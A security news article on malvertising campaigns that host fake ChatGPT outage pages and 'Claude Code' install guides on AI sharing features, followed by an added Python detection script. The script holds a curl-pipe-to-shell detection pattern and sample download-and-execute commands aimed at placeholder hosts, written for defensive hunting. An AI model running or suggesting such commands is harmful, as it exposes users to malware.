Threat actors are delivering malware from phishing pages hosted on legitimate ChatGPT domains, Push Security has warned.
The vendor claimed that hackers are abusing ChatGPT's code-rendering feature to build pages spoofing the brand. These redirect victims to a fake download page designed to deliver a malicious executable.
“These are essentially InstallFix attacks — a variant of the ClickFix family that Push documented earlier this year — and they exploit the fact that AI tools have normalized command-line installation workflows for a population of users who lack the experience to distinguish a legitimate terminal command from a malicious one,” it explained.
It’s unclear exactly what the payload is, although infostealer malware is suspected.
Victims are initially lured to the fake pages by malicious Google ads and SEO poisoning. Clicking through takes them to a “fully designed, self-contained web page” mocked up with ChatGPT branding that claims there’s a service outage due to high traffic.
It urges visitors to download the desktop version of the app in order to proceed. However, doing so takes them to a phishing site mimicking ChatGPT, which will install malware if users hit the “download” button.
Because the first page is hosted on a chatgpt.com/s/ URL, it is trusted by most scanning tools, Push Security warned.
Additionally, the second phishing page will not render if it suspects security researchers are trying to dig deeper.
“Real users in a browser see the fake download page; automated scanners and bots see something benign,” the report noted. “This kind of conditional rendering is a well-established evasion technique in the malvertising ecosystem, and it makes the malicious infrastructure harder for security teams and threat intelligence services to identify and analyze.”
Variations on the Same Theme
This is the latest in a string of similar campaigns abusing chatbot features. Another spotted by Push Security uses shared conversations, a feature that allows users to generate a unique URL for a chat they’ve had with the AI so that others can read it.
Users are lured to the pages in the same way as the attack flow above, but this time they are presented with “a shared chat disguised as a ‘Claude Code on Mac’ installation guide, attributed to ‘Apple Support,’ containing a curl command that downloads and executes malware.”
The vendor said it has seen both ChatGPT and Claude users targeted in the same way.
“The fact that both the ChatGPT and Claude variants are appearing in Push customer environments suggests a campaign – or at least a shared playbook – that is actively experimenting with different platforms and different social engineering approaches to find what converts best,” it explained.
Push Security warned that four out of five ClickFix attacks are now reached via search results rather than email, with malvertising often tightly scoped to victim type, geography and other attributes.
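One way to hunt for the flows described above, as an added example that is not from Push Security's report: flag a download-and-execute shell command that runs on a host shortly after it loaded a shared-content page on an AI platform. The log line format, host names, the 10-minute window and the example.invalid URLs are constructed assumptions; only the chatgpt.com/s/ prefix comes from the article, and the tuple should be extended with the shared-chat prefixes relevant to your environment.

```python
import re
from datetime import datetime, timedelta

SHARED_PREFIXES = ("https://chatgpt.com/s/",)  # path named in the article
WINDOW = timedelta(minutes=10)                 # assumed correlation window

# curl/wget piped into a shell, or a shell executing fetched output
FETCH_AND_RUN = re.compile(
    r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z|da)?sh\b"
    r"|\b(ba|z|da)?sh\s+(-c\s+[\"']?\$\(|<\()\s*(curl|wget)\b"
)

def parse(line):
    """Split 'ISO-timestamp host kind payload' into typed fields."""
    ts, host, kind, payload = line.split(" ", 3)
    return datetime.fromisoformat(ts), host, kind, payload

def correlate(lines):
    """Return (host, shared_url, cmdline) for each fetch-and-run command
    seen on a host within WINDOW after it loaded a shared-content page."""
    last_visit = {}  # host -> (time, url) of most recent shared-page load
    hits = []
    for ts, host, kind, payload in sorted(map(parse, lines)):
        if kind == "web" and payload.startswith(SHARED_PREFIXES):
            last_visit[host] = (ts, payload)
        elif kind == "proc" and FETCH_AND_RUN.search(payload):
            seen = last_visit.get(host)
            if seen and ts - seen[0] <= WINDOW:
                hits.append((host, seen[1], payload))
    return hits

# Constructed sample events (hosts, IDs and URLs are placeholders)
SAMPLE = [
    "2025-01-01T10:00:00 mac-01 web https://chatgpt.com/s/EXAMPLE_ID",
    "2025-01-01T10:02:30 mac-01 proc curl -fsSL https://example.invalid/i.sh | bash",
    "2025-01-01T10:05:00 mac-02 proc curl -fsSL https://example.invalid/i.sh | bash",
    "2025-01-01T11:00:00 mac-03 web https://chatgpt.com/s/EXAMPLE_ID",
    "2025-01-01T11:01:00 mac-03 proc curl -s https://example.invalid/n | shasum",
    "2025-01-01T12:00:00 mac-04 web https://chatgpt.com/s/EXAMPLE_ID",
    "2025-01-01T12:03:00 mac-04 proc bash -c \"$(curl -fsSL https://example.invalid/i.sh)\"",
]

if __name__ == "__main__":
    for hit in correlate(SAMPLE):
        print(hit)
```

Hosts that run the same command without a preceding shared-page load (mac-02 in the sample) are deliberately not reported here; alerting on the command pattern alone is a separate, noisier rule.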
